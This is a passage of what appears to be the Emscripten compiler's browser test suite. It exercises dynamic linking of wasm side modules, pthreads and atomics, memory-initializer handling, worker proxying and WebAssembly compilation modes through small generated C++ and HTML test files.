self.btest(self.in_dir('main.cpp'), '2', args=['-s', 'MAIN_MODULE=1', '-O2', '--pre-js', 'pre.js', '-s', 'WASM=1', '--proxy-to-worker'])
print('wasm (will auto-preload since no sync binary reading)')
open('pre.js', 'w').write('''
Module.dynamicLibraries = ['side.wasm'];
''')
# same wasm side module works
self.btest(self.in_dir('main.cpp'), '2', args=['-s', 'MAIN_MODULE=1', '-O2', '--pre-js', 'pre.js', '-s', 'WASM=1'])
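# Roughly the same dynamic-linking setup as above, expressed as plain shell
# commands (the output names here are illustrative only):
#   emcc side.cpp -s SIDE_MODULE=1 -O2 -o side.wasm
#   emcc main.cpp -s MAIN_MODULE=1 -O2 --pre-js pre.js -o main.html
# where pre.js sets Module.dynamicLibraries = ['side.wasm'] so the runtime
# loads the side module before main() runs.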
@requires_hardware
def test_dynamic_link_glemu(self):
open('pre.js', 'w').write('''
Module.dynamicLibraries = ['side.wasm'];
''')
open('main.cpp', 'w').write(r'''
#include <stdio.h>
#include <string.h>
#include <assert.h>
const char *side();
int main() {
const char *exts = side();
puts(side());
assert(strstr(exts, "GL_EXT_texture_env_combine"));
REPORT_RESULT(1);
return 0;
}
''')
open('side.cpp', 'w').write(r'''
#include "SDL/SDL.h"
#include "SDL/SDL_opengl.h"
const char *side() {
SDL_Init(SDL_INIT_VIDEO);
SDL_SetVideoMode(600, 600, 16, SDL_OPENGL);
return (const char *)glGetString(GL_EXTENSIONS);
}
''')
Popen([PYTHON, EMCC, 'side.cpp', '-s', 'SIDE_MODULE=1', '-O2', '-o', 'side.wasm', '-lSDL']).communicate()
self.btest(self.in_dir('main.cpp'), '1', args=['-s', 'MAIN_MODULE=1', '-O2', '-s', 'LEGACY_GL_EMULATION=1', '-lSDL', '-lGL', '--pre-js', 'pre.js'])
def test_memory_growth_during_startup(self):
open('data.dat', 'w').write('X' * (30*1024*1024))
self.btest('browser_test_hello_world.c', '0', args=['-s', 'ASSERTIONS=1', '-s', 'ALLOW_MEMORY_GROWTH=1', '-s', 'TOTAL_MEMORY=16MB', '-s', 'TOTAL_STACK=5000', '--preload-file', 'data.dat'])
# pthreads tests
def prep_no_SAB(self):
open('html.html', 'w').write(open(path_from_root('src', 'shell_minimal.html')).read().replace('''<body>''', '''<body>
<script>
SharedArrayBuffer = undefined;
Atomics = undefined;
</script>
'''))
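# The injected <script> above runs before the compiled output is loaded, so the
# generated code sees SharedArrayBuffer/Atomics as undefined; pthread tests that
# pass '--shell-file html.html' therefore exercise the no-threading fallback path.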
# Test that the emscripten_ atomics api functions work.
def test_pthread_atomics(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_atomics.cpp'), expected='0', args=['-s', 'TOTAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS=2', '--separate-asm', '-s', 'PTHREAD_POOL_SIZE=8'], timeout=120) # extra time on first test, to be sure to build all libraries
# Test 64-bit atomics.
def test_pthread_64bit_atomics(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_64bit_atomics.cpp'), expected='0', args=['-s', 'TOTAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS=2', '--separate-asm', '-s', 'PTHREAD_POOL_SIZE=8'], timeout=90)
# Test 64-bit C++11 atomics.
def test_pthread_64bit_cxx11_atomics(self):
for opt in [['-O0'], ['-O3']]:
for pthreads in [[], ['-s', 'USE_PTHREADS=1']]:
self.btest(path_from_root('tests', 'pthread', 'test_pthread_64bit_cxx11_atomics.cpp'), expected='0', args=opt + pthreads + ['-std=c++11', '-s', 'USE_PTHREADS=1'], timeout=30)
# Test the old GCC atomic __sync_fetch_and_op builtin operations.
def test_pthread_gcc_atomic_fetch_and_op(self):
# We need to resort to using regexes to optimize out SharedArrayBuffer when pthreads are not supported, which is brittle!
# Therefore perform very extensive testing of different codegen modes to catch any problems.
for opt in [[], ['-O1'], ['-O2'], ['-O3'], ['-O3', '-s', 'AGGRESSIVE_VARIABLE_ELIMINATION=1'], ['-Os'], ['-Oz']]:
for debug in [[], ['-g1'], ['-g2'], ['-g4']]:
for f32 in [[], ['-s', 'PRECISE_F32=1']]:
print(opt, debug, f32)
self.btest(path_from_root('tests', 'pthread', 'test_pthread_gcc_atomic_fetch_and_op.cpp'), expected='0', args=opt+debug+f32+['-s', 'TOTAL_MEMORY=64MB', '-s', 'USE_PTHREADS=2', '--separate-asm', '-s', 'PTHREAD_POOL_SIZE=8', '-s', 'WASM=0'], timeout=60)
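# The nested loops above cover 7 optimization settings x 4 debug levels x 2
# float modes, i.e. 56 separate builds of this one test.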
# 64-bit version of the above test.
def test_pthread_gcc_64bit_atomic_fetch_and_op(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_gcc_64bit_atomic_fetch_and_op.cpp'), expected='0', args=['-s', 'TOTAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS=2', '--separate-asm', '-s', 'PTHREAD_POOL_SIZE=8', '-s', 'WASM=0'], timeout=30)
# Test the old GCC atomic __sync_op_and_fetch builtin operations.
def test_pthread_gcc_atomic_op_and_fetch(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_gcc_atomic_op_and_fetch.cpp'), expected='0', args=['-s', 'TOTAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS=2', '--separate-asm', '-s', 'PTHREAD_POOL_SIZE=8', '-s', 'WASM=0'], timeout=30)
# 64-bit version of the above test.
def test_pthread_gcc_64bit_atomic_op_and_fetch(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_gcc_64bit_atomic_op_and_fetch.cpp'), expected='0', args=['-s', 'TOTAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS=2', '--separate-asm', '-s', 'PTHREAD_POOL_SIZE=8', '-s', 'WASM=0'], timeout=30)
# Tests the remaining GCC atomics not covered by the two tests above.
def test_pthread_gcc_atomics(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_gcc_atomics.cpp'), expected='0', args=['-s', 'TOTAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS=2', '--separate-asm', '-s', 'PTHREAD_POOL_SIZE=8'], timeout=30)
# Test the __sync_lock_test_and_set and __sync_lock_release primitives.
def test_pthread_gcc_spinlock(self):
for arg in [[], ['-DUSE_EMSCRIPTEN_INTRINSICS']]:
self.btest(path_from_root('tests', 'pthread', 'test_pthread_gcc_spinlock.cpp'), expected='800', args=['-s', 'TOTAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS=2', '--separate-asm', '-s', 'PTHREAD_POOL_SIZE=8', '-s', 'WASM=0'] + arg, timeout=30)
# Test that basic thread creation works.
def test_pthread_create(self):
for opt in [['-O0'], ['-O3']]:
for pthreads in [['-s', 'USE_PTHREADS=1'], ['-s', 'USE_PTHREADS=2', '--separate-asm']]:
print(str(opt) + ' ' + str(pthreads))
self.btest(path_from_root('tests', 'pthread', 'test_pthread_create.cpp'), expected='0', args=opt + pthreads + ['-s', 'TOTAL_MEMORY=64MB', '-s', 'PTHREAD_POOL_SIZE=8'], timeout=30)
if 'USE_PTHREADS=2' in pthreads:
self.prep_no_SAB()
self.btest(path_from_root('tests', 'pthread', 'test_pthread_create.cpp'), expected='0', args=opt + pthreads + ['-s', 'PTHREAD_POOL_SIZE=8', '--shell-file', 'html.html'], timeout=30)
# Tests the -s PROXY_TO_PTHREAD=1 option.
def test_pthread_proxy_to_pthread(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_proxy_to_pthread.c'), expected='1', args=['-O3', '-s', 'USE_PTHREADS=1', '-s', 'PROXY_TO_PTHREAD=1'], timeout=30)
# Test that a pthread can spawn another pthread of its own.
def test_pthread_create_pthread(self):
for opt in [['-s', 'USE_PTHREADS=2', '--separate-asm'], ['-s', 'USE_PTHREADS=1']]:
self.btest(path_from_root('tests', 'pthread', 'test_pthread_create_pthread.cpp'), expected='1', args=opt + ['-O3', '-s', 'PTHREAD_POOL_SIZE=2'], timeout=30)
# Test another case of pthreads spawning pthreads, but this time the callers immediately join on the threads they created.
def test_pthread_nested_spawns(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_nested_spawns.cpp'), expected='1', args=['-O3', '-s', 'USE_PTHREADS=2', '--separate-asm', '-s', 'PTHREAD_POOL_SIZE=2'], timeout=30)
# Test that main thread can wait for a pthread to finish via pthread_join().
def test_pthread_join(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_join.cpp'), expected='6765', args=['-O3', '-s', 'USE_PTHREADS=2', '--separate-asm', '-s', 'PTHREAD_POOL_SIZE=8', '-s', 'ERROR_ON_UNDEFINED_SYMBOLS=1'], timeout=30)
# Test pthread_cancel() operation
def test_pthread_cancel(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_cancel.cpp'), expected='1', args=['-O3', '-s', 'USE_PTHREADS=2', '--separate-asm', '-s', 'PTHREAD_POOL_SIZE=8'], timeout=30)
# Test pthread_kill() operation
def test_pthread_kill(self):
if get_browser() and 'chrom' in get_browser().lower():
# This test hangs the chrome render process, and keeps subsequent tests from passing too
self.skipTest("pthread_kill hangs chrome renderer")
self.btest(path_from_root('tests', 'pthread', 'test_pthread_kill.cpp'), expected='0', args=['-O3', '-s', 'USE_PTHREADS=2', '--separate-asm', '-s', 'PTHREAD_POOL_SIZE=8'], timeout=30)
# Test that pthread cleanup stack (pthread_cleanup_push/_pop) works.
def test_pthread_cleanup(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_cleanup.cpp'), expected='907640832', args=['-O3', '-s', 'USE_PTHREADS=2', '--separate-asm', '-s', 'PTHREAD_POOL_SIZE=8'], timeout=30)
# Tests the pthread mutex api.
def test_pthread_mutex(self):
for arg in [[], ['-DSPINLOCK_TEST']]:
self.btest(path_from_root('tests', 'pthread', 'test_pthread_mutex.cpp'), expected='50', args=['-s', 'TOTAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS=2', '--separate-asm', '-s', 'PTHREAD_POOL_SIZE=8'] + arg, timeout=30)
# Test that memory allocation is thread-safe.
def test_pthread_malloc(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_malloc.cpp'), expected='0', args=['-s', 'TOTAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS=2', '--separate-asm', '-s', 'PTHREAD_POOL_SIZE=8'], timeout=30)
# Stress test pthreads allocating memory that will call sbrk(), while the main thread has to free up the data.
def test_pthread_malloc_free(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_malloc_free.cpp'), expected='0', args=['-s', 'TOTAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS=2', '--separate-asm', '-s', 'PTHREAD_POOL_SIZE=8', '-s', 'TOTAL_MEMORY=256MB'], timeout=30)
# Test that the pthread_barrier API works ok.
def test_pthread_barrier(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_barrier.cpp'), expected='0', args=['-s', 'TOTAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS=2', '--separate-asm', '-s', 'PTHREAD_POOL_SIZE=8'], timeout=30)
# Test the pthread_once() function.
def test_pthread_once(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_once.cpp'), expected='0', args=['-s', 'TOTAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS=2', '--separate-asm', '-s', 'PTHREAD_POOL_SIZE=8'], timeout=30)
# Test against a certain thread exit time handling bug by spawning tons of threads.
def test_pthread_spawns(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_spawns.cpp'), expected='0', args=['-s', 'TOTAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS=2', '--separate-asm', '-s', 'PTHREAD_POOL_SIZE=8'], timeout=30)
# It is common for code to flip volatile global vars for thread control. This is a bit lax, but nevertheless, test whether that
# kind of scheme will work with Emscripten as well.
def test_pthread_volatile(self):
for arg in [[], ['-DUSE_C_VOLATILE']]:
self.btest(path_from_root('tests', 'pthread', 'test_pthread_volatile.cpp'), expected='1', args=['-s', 'TOTAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS=2', '--separate-asm', '-s', 'PTHREAD_POOL_SIZE=8'] + arg, timeout=30)
# Test thread-specific data (TLS).
def test_pthread_thread_local_storage(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_thread_local_storage.cpp'), expected='0', args=['-s', 'TOTAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS=2', '--separate-asm', '-s', 'PTHREAD_POOL_SIZE=8'], timeout=30)
# Test the pthread condition variable creation and waiting.
def test_pthread_condition_variable(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_condition_variable.cpp'), expected='0', args=['-s', 'TOTAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS=2', '--separate-asm', '-s', 'PTHREAD_POOL_SIZE=8'], timeout=30)
# Test that pthreads are able to do printf.
def test_pthread_printf(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_printf.cpp'), expected='0', args=['-s', 'TOTAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS=2', '--separate-asm', '-s', 'PTHREAD_POOL_SIZE=1'], timeout=30)
# Test that pthreads are able to do cout. Failed due to https://bugzilla.mozilla.org/show_bug.cgi?id=1154858.
def test_pthread_iostream(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_iostream.cpp'), expected='0', args=['-s', 'TOTAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS=2', '--separate-asm', '-s', 'PTHREAD_POOL_SIZE=1'], timeout=30)
# Test that the main thread is able to use pthread_set/getspecific.
def test_pthread_setspecific_mainthread(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_setspecific_mainthread.cpp'), expected='0', args=['-s', 'TOTAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS=2', '--separate-asm'], timeout=30)
self.prep_no_SAB()
self.btest(path_from_root('tests', 'pthread', 'test_pthread_setspecific_mainthread.cpp'), expected='0', args=['-s', 'TOTAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS=2', '--separate-asm', '--shell-file', 'html.html', '-s', 'WASM=0'], timeout=30)
# Test the -s PTHREAD_HINT_NUM_CORES=x command line variable.
def test_pthread_num_logical_cores(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_num_logical_cores.cpp'), expected='0', args=['-O3', '-s', 'USE_PTHREADS=2', '--separate-asm', '-s', 'PTHREAD_HINT_NUM_CORES=2'], timeout=30)
self.prep_no_SAB()
self.btest(path_from_root('tests', 'pthread', 'test_pthread_num_logical_cores.cpp'), expected='0', args=['-O3', '-g', '-s', 'USE_PTHREADS=2', '--separate-asm', '-s', 'PTHREAD_HINT_NUM_CORES=2', '--shell-file', 'html.html', '-s', 'WASM=0'], timeout=30)
# Test that pthreads have access to filesystem.
def test_pthread_file_io(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_file_io.cpp'), expected='0', args=['-O3', '-s', 'USE_PTHREADS=2', '--separate-asm', '-s', 'PTHREAD_POOL_SIZE=1'], timeout=30)
# Test that the pthread_create() function operates benignly in the case that threading is not supported.
def test_pthread_supported(self):
for args in [[], ['-s', 'USE_PTHREADS=2', '--separate-asm', '-s', 'PTHREAD_POOL_SIZE=8']]:
self.btest(path_from_root('tests', 'pthread', 'test_pthread_supported.cpp'), expected='0', args=['-O3'] + args, timeout=30)
def test_pthread_separate_asm_pthreads(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_atomics.cpp'), expected='0', args=['-s', 'TOTAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=8', '--separate-asm', '--profiling'], timeout=30)
def test_pthread_custom_pthread_main_url(self):
self.clear()
os.makedirs(os.path.join(self.get_dir(), 'cdn'))
open(os.path.join(self.get_dir(), 'main.cpp'), 'w').write(self.with_report_result(r'''
#include <stdio.h>
#include <string.h>
#include <emscripten/emscripten.h>
#include <emscripten/threading.h>
#include <pthread.h>
int result = 0;
void *thread_main(void *arg) {
emscripten_atomic_store_u32(&result, 1);
pthread_exit(0);
}
int main() {
pthread_t t;
if (emscripten_has_threading_support()) {
pthread_create(&t, 0, thread_main, 0);
pthread_join(t, 0);
} else {
result = 1;
}
REPORT_RESULT(result);
}
'''))
# Test that it is possible to define a "Module.pthreadMainPrefixURL" string to specify where pthread-main.js will be loaded from.
open(self.in_dir('shell.html'), 'w').write(open(path_from_root('src', 'shell.html')).read().replace('var Module = {', 'var Module = { pthreadMainPrefixURL: "cdn/", '))
Popen([PYTHON, EMCC, os.path.join(self.get_dir(), 'main.cpp'), '--shell-file', 'shell.html', '-s', 'WASM=0', '-s', 'IN_TEST_HARNESS=1', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=1', '-o', 'test.html']).communicate()
shutil.move('pthread-main.js', os.path.join('cdn', 'pthread-main.js'))
self.run_browser('test.html', '', '/report_result?1')
# Test that it is possible to define a "Module.locateFile(foo)" function to specify where pthread-main.js will be loaded from.
open(self.in_dir('shell2.html'), 'w').write(open(path_from_root('src', 'shell.html')).read().replace('var Module = {', 'var Module = { locateFile: function(filename) { if (filename == "pthread-main.js") return "cdn/pthread-main.js"; else return filename; }, '))
Popen([PYTHON, EMCC, os.path.join(self.get_dir(), 'main.cpp'), '--shell-file', 'shell2.html', '-s', 'WASM=0', '-s', 'IN_TEST_HARNESS=1', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=1', '-o', 'test2.html']).communicate()
try_delete('pthread-main.js')
self.run_browser('test2.html', '', '/report_result?1')
# Test that there is no deadlock when the main thread is performing a futex wait while a pthread needs it to do a proxied operation (before that pthread would wake up the main thread).
def test_pthread_proxying_in_futex_wait(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_proxying_in_futex_wait.cpp'), expected='0', args=['-O3', '-s', 'USE_PTHREADS=2', '-s', 'PTHREAD_POOL_SIZE=1', '--separate-asm'], timeout=30)
# Test that sbrk() operates properly in multithreaded conditions
def test_pthread_sbrk(self):
for aborting_malloc in [0, 1]:
print('aborting malloc=' + str(aborting_malloc))
# With aborting malloc = 1, test allocating memory in threads
# With aborting malloc = 0, allocate so much memory in threads that some of the allocations fail.
self.btest(path_from_root('tests', 'pthread', 'test_pthread_sbrk.cpp'), expected='0', args=['-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=8', '--separate-asm', '-s', 'ABORTING_MALLOC=' + str(aborting_malloc), '-DABORTING_MALLOC=' + str(aborting_malloc), '-s', 'TOTAL_MEMORY=128MB'], timeout=30)
# Test that -s ABORTING_MALLOC=0 works in both pthreads and non-pthreads builds. (sbrk fails gracefully)
def test_pthread_gauge_available_memory(self):
for opts in [[], ['-O2']]:
for args in [[], ['-s', 'USE_PTHREADS=1']]:
self.btest(path_from_root('tests', 'gauge_available_memory.cpp'), expected='1', args=['-s', 'ABORTING_MALLOC=0'] + args + opts, timeout=30)
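# In the two tests above, -s ABORTING_MALLOC=0 makes a failed allocation return
# NULL (and sbrk() report failure) instead of aborting the program, which is what
# lets the "allocate until it fails" code paths observe the failure and continue.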
# Test that the proxying of user code operations from pthreads to the main thread works
def test_pthread_run_on_main_thread(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_run_on_main_thread.cpp'), expected='0', args=['-O3', '-s', 'USE_PTHREADS=2', '-s', 'PTHREAD_POOL_SIZE=1', '--separate-asm'], timeout=30)
# Test how a large number of back-to-back proxying operations behave.
def test_pthread_run_on_main_thread_flood(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_run_on_main_thread_flood.cpp'), expected='0', args=['-O3', '-s', 'USE_PTHREADS=2', '-s', 'PTHREAD_POOL_SIZE=1', '--separate-asm'], timeout=30)
# Test that it is possible to synchronously call a JavaScript function on the main thread and get a return value back.
def test_pthread_call_sync_on_main_thread(self):
self.btest(path_from_root('tests', 'pthread', 'call_sync_on_main_thread.c'), expected='1', args=['-O3', '-s', 'USE_PTHREADS=1', '-s', 'PROXY_TO_PTHREAD=1', '-DPROXY_TO_PTHREAD=1', '--js-library', path_from_root('tests', 'pthread', 'call_sync_on_main_thread.js')])
self.btest(path_from_root('tests', 'pthread', 'call_sync_on_main_thread.c'), expected='1', args=['-O3', '-s', 'USE_PTHREADS=1', '-DPROXY_TO_PTHREAD=0', '--js-library', path_from_root('tests', 'pthread', 'call_sync_on_main_thread.js')])
self.btest(path_from_root('tests', 'pthread', 'call_sync_on_main_thread.c'), expected='1', args=['-Oz', '-DPROXY_TO_PTHREAD=0', '--js-library', path_from_root('tests', 'pthread', 'call_sync_on_main_thread.js')])
# Test that it is possible to asynchronously call a JavaScript function on the main thread.
def test_pthread_call_async_on_main_thread(self):
self.btest(path_from_root('tests', 'pthread', 'call_async_on_main_thread.c'), expected='7', args=['-O3', '-s', 'USE_PTHREADS=1', '-s', 'PROXY_TO_PTHREAD=1', '-DPROXY_TO_PTHREAD=1', '--js-library', path_from_root('tests', 'pthread', 'call_async_on_main_thread.js')])
self.btest(path_from_root('tests', 'pthread', 'call_async_on_main_thread.c'), expected='7', args=['-O3', '-s', 'USE_PTHREADS=1', '-DPROXY_TO_PTHREAD=0', '--js-library', path_from_root('tests', 'pthread', 'call_async_on_main_thread.js')])
self.btest(path_from_root('tests', 'pthread', 'call_async_on_main_thread.c'), expected='7', args=['-Oz', '-DPROXY_TO_PTHREAD=0', '--js-library', path_from_root('tests', 'pthread', 'call_async_on_main_thread.js')])
# Tests that spawning a new thread does not cause a reinitialization of the global data section of the application memory area.
def test_pthread_global_data_initialization(self):
for mem_init_mode in [[], ['--memory-init-file', '0'], ['--memory-init-file', '1'], ['-s', 'MEM_INIT_METHOD=2']]:
for args in [[], ['-O3']]:
self.btest(path_from_root('tests', 'pthread', 'test_pthread_global_data_initialization.c'), expected='20', args=args+mem_init_mode+['-s', 'USE_PTHREADS=1', '-s', 'PROXY_TO_PTHREAD=1', '-s', 'PTHREAD_POOL_SIZE=1'])
# Test that emscripten_get_now() reports coherent wallclock times across all pthreads, instead of each pthread independently reporting wallclock times since the launch of that pthread.
def test_pthread_clock_drift(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_clock_drift.cpp'), expected='1', args=['-O3', '-s', 'USE_PTHREADS=1', '-s', 'PROXY_TO_PTHREAD=1'])
# test atomicrmw i64
def test_atomicrmw_i64(self):
# TODO: enable this with wasm, currently pthreads/atomics have limitations
Popen([PYTHON, EMCC, path_from_root('tests', 'atomicrmw_i64.ll'), '-s', 'USE_PTHREADS=1', '-s', 'IN_TEST_HARNESS=1', '-o', 'test.html', '-s', 'WASM=0']).communicate()
self.run_browser('test.html', None, '/report_result?0')
# Test that it is possible to send a signal by calling alarm(timeout), which in turn invokes the signal handler set by signal(SIGALRM, func).
def test_sigalrm(self):
self.btest(path_from_root('tests', 'sigalrm.cpp'), expected='0', args=['-O3'], timeout=30)
def test_meminit_pairs(self):
d = 'const char *data[] = {\n "'
d += '",\n "'.join(''.join('\\x{:02x}\\x{:02x}'.format(i, j)
for j in range(256)) for i in range(256))
with open(path_from_root('tests', 'meminit_pairs.c')) as f:
d += '"\n};\n' + f.read()
args = ["-O2", "--memory-init-file", "0", "-s", "MEM_INIT_METHOD=2", "-s", "ASSERTIONS=1", '-s', 'WASM=0']
self.btest(d, expected='0', args=args + ["--closure", "0"])
self.btest(d, expected='0', args=args + ["--closure", "0", "-g"])
self.btest(d, expected='0', args=args + ["--closure", "1"])
def test_meminit_big(self):
d = 'const char *data[] = {\n "'
d += '",\n "'.join([''.join('\\x{:02x}\\x{:02x}'.format(i, j)
for j in range(256)) for i in range(256)]*256)
with open(path_from_root('tests', 'meminit_pairs.c')) as f:
d += '"\n};\n' + f.read()
assert len(d) > (1 << 27) # more than 32M memory initializer
args = ["-O2", "--memory-init-file", "0", "-s", "MEM_INIT_METHOD=2", "-s", "ASSERTIONS=1", '-s', 'WASM=0']
self.btest(d, expected='0', args=args + ["--closure", "0"])
self.btest(d, expected='0', args=args + ["--closure", "0", "-g"])
self.btest(d, expected='0', args=args + ["--closure", "1"])
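# Size arithmetic for the two meminit tests above: each escaped pair "\xII\xJJ"
# contributes 2 data bytes, so test_meminit_pairs embeds 2 * 256 * 256 = 128 KiB
# of initializer data, and test_meminit_big repeats that 256 times for ~32 MiB.
# At 4 source characters per byte that is just over 2**27 characters of escaped
# text once the separators and appended .c source are included, which is what the
# len(d) > (1 << 27) assert checks.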
def test_canvas_style_proxy(self):
self.btest('canvas_style_proxy.c', expected='1', args=['--proxy-to-worker', '--shell-file', path_from_root('tests/canvas_style_proxy_shell.html'), '--pre-js', path_from_root('tests/canvas_style_proxy_pre.js')])
def test_canvas_size_proxy(self):
self.btest(path_from_root('tests', 'canvas_size_proxy.c'), expected='0', args=['--proxy-to-worker'])
def test_custom_messages_proxy(self):
self.btest(path_from_root('tests', 'custom_messages_proxy.c'), expected='1', args=['--proxy-to-worker', '--shell-file', path_from_root('tests', 'custom_messages_proxy_shell.html'), '--post-js', path_from_root('tests', 'custom_messages_proxy_postjs.js')])
def test_separate_asm(self):
for opts in [['-O0'], ['-O1'], ['-O2'], ['-O2', '--closure', '1']]:
print(opts)
open('src.cpp', 'w').write(self.with_report_result(open(path_from_root('tests', 'browser_test_hello_world.c')).read()))
run_process([PYTHON, EMCC, 'src.cpp', '-o', 'test.html', '-s', 'WASM=0'] + opts)
self.run_browser('test.html', None, '/report_result?0')
print('run one')
open('one.html', 'w').write('<script src="test.js"></script>')
self.run_browser('one.html', None, '/report_result?0')
print('run two')
run_process([PYTHON, path_from_root('tools', 'separate_asm.py'), 'test.js', 'asm.js', 'rest.js'])
open('two.html', 'w').write('''
<script>
var Module = {};
</script>
<script src="asm.js"></script>
<script src="rest.js"></script>
''')
self.run_browser('two.html', None, '/report_result?0')
print('run hello world')
self.clear()
assert not os.path.exists('test.asm.js')
self.btest('browser_test_hello_world.c', expected='0', args=opts + ['-s', 'WASM=0', '--separate-asm'])
assert os.path.exists('test.asm.js')
os.unlink('test.asm.js')
print('see a fail')
self.run_browser('test.html', None, '[no http server activity]', timeout=5) # fail without the asm
def test_emterpretify_file(self):
open('shell.html', 'w').write('''
<!--
{{{ SCRIPT }}} // ignore this, we do it ourselves
-->
<script>
var Module = {};
var xhr = new XMLHttpRequest();
xhr.open('GET', 'code.dat', true);
xhr.responseType = 'arraybuffer';
xhr.onload = function() {
Module.emterpreterFile = xhr.response;
var script = document.createElement('script');
script.src = "test.js";
document.body.appendChild(script);
};
xhr.send(null);
</script>
''')
try_delete('code.dat')
self.btest('browser_test_hello_world.c', expected='0', args=['-s', 'EMTERPRETIFY=1', '-s', 'EMTERPRETIFY_FILE="code.dat"', '-O2', '-g', '--shell-file', 'shell.html', '-s', 'ASSERTIONS=1'])
assert os.path.exists('code.dat')
try_delete('code.dat')
self.btest('browser_test_hello_world.c', expected='0', args=['-s', 'EMTERPRETIFY=1', '-s', 'EMTERPRETIFY_FILE="code.dat"', '-O2', '-g', '-s', 'ASSERTIONS=1'])
assert os.path.exists('code.dat')
def test_vanilla_html_when_proxying(self):
for opts in [0, 1, 2]:
print(opts)
open('src.cpp', 'w').write(self.with_report_result(open(path_from_root('tests', 'browser_test_hello_world.c')).read()))
Popen([PYTHON, EMCC, 'src.cpp', '-o', 'test.js', '-O' + str(opts), '--proxy-to-worker']).communicate()
open('test.html', 'w').write('<script src="test.js"></script>')
self.run_browser('test.html', None, '/report_result?0')
def test_in_flight_memfile_request(self):
# test the XHR for an asm.js mem init file being in flight already
for o in [0, 1, 2]:
print(o)
opts = ['-O' + str(o), '-s', 'WASM=0']
print('plain html')
open('src.cpp', 'w').write(self.with_report_result(open(path_from_root('tests', 'in_flight_memfile_request.c')).read()))
Popen([PYTHON, EMCC, 'src.cpp', '-o', 'test.js'] + opts).communicate()
open('test.html', 'w').write('<script src="test.js"></script>')
self.run_browser('test.html', None, '/report_result?0') # the in-flight request never happens when we provide our own HTML like this.
print('default html')
self.btest('in_flight_memfile_request.c', expected='0' if o < 2 else '1', args=opts) # should happen when there is a mem init file (-O2+)
def test_split_memory_large_file(self):
size = 2*1024*1024
open('huge.dat', 'wb').write(bytearray((x*x)&255 for x in range(size*2))) # larger than a memory chunk
self.btest('split_memory_large_file.cpp', expected='1', args=['-s', 'WASM=0', '-s', 'SPLIT_MEMORY=' + str(size), '-s', 'TOTAL_MEMORY=128MB', '-s', 'TOTAL_STACK=10240', '--preload-file', 'huge.dat'], timeout=60)
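# Sizes above: SPLIT_MEMORY chunks are 2 MiB (size) while huge.dat is 4 MiB
# (size * 2), so preloading it necessarily spans more than one memory chunk.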
def test_binaryen_interpreter(self):
self.btest('browser_test_hello_world.c', expected='0', args=['-s', 'BINARYEN=1', '-s', 'BINARYEN_METHOD="interpret-binary"'])
self.btest('browser_test_hello_world.c', expected='0', args=['-s', 'BINARYEN=1', '-s', 'BINARYEN_METHOD="interpret-binary"', '-O2'])
def test_binaryen_async(self):
# notice when we use async compilation
script = '''
<script>
// note if we do async compilation
var real_wasm_instantiate = WebAssembly.instantiate;
var real_wasm_instantiateStreaming = WebAssembly.instantiateStreaming;
if (typeof real_wasm_instantiateStreaming === 'function') {
WebAssembly.instantiateStreaming = function(a, b) {
Module.sawAsyncCompilation = true;
return real_wasm_instantiateStreaming(a, b);
};
} else {
WebAssembly.instantiate = function(a, b) {
Module.sawAsyncCompilation = true;
return real_wasm_instantiate(a, b);
};
}
// show stderr for the viewer's fun
err = function(x) {
out('<<< ' + x + ' >>>');
console.log(x);
};
</script>
{{{ SCRIPT }}}
'''
shell_with_script('shell.html', 'shell.html', script)
common_args = ['-s', 'WASM=1', '--shell-file', 'shell.html']
for opts, expect in [
([], 1),
(['-O1'], 1),
(['-O2'], 1),
(['-O3'], 1),
